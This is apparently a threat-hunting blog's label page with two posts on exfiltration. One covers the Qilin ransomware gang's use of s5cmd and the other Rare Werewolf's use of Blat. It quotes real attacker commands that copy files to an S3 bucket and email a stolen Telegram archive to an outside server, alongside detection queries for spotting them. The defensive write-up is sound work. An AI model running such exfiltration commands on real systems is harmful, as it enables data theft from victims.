Posts

Showing posts with the label exfiltration

232. Qilin Ransomware Gang Abuses S5cmd for Data Exfiltration

Image
Hello everyone! Data exfiltration. Almost every ransomware-related incident includes this stage. And adversaries often experiment with various free tools to evade defenses. And today we're going to talk about the following technique: Transfer Data to Cloud Account (T1537) . Huntress noted that in a recent Qilin ransomware attack the adversary used s5cmd for exfiltration: s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource] For detection, we can use, for example, popular file types: event_type: "processcreatewin" AND cmdline: ("include" AND "pdf" AND "xls" AND "doc") See you tomorrow!

098. Adversaries Keep Abusing Blat for Data Exfiltration

Image
Hello everyone! Today I decided to share some information on an interesting exfiltration tool abused by Rare Werewolf . It's called Blat. It's been used by this activity cluster for quite a long time, here's an example : blat.exe -to in@vniir.nl -f "TELEGRAM<sent1@vniir.nl>" -server mail.vniir.nl -port 587 -u sent1@vniir.nl -pw fuFhDK3anVteQCvfVQWk -subject "Telegram 927537/user" -body "Telegram 927537/user" -attach "C:\Users\user\Window\tdata.rar" As you can see, tha adversary uses this tool to exfiltrate collected Telegram messenger data. So, yes, Blat is just a small legitimate utility enabling the threat actors to send collected data via email! We can hunt for such behaviors focusing on credentials and attachments: event_type: "processcreatewin" AND proc_file_originalfilename: "blat.exe" AND cmdline: ("u" AND "pw" AND "attach") By the way, the sample have even more interestin...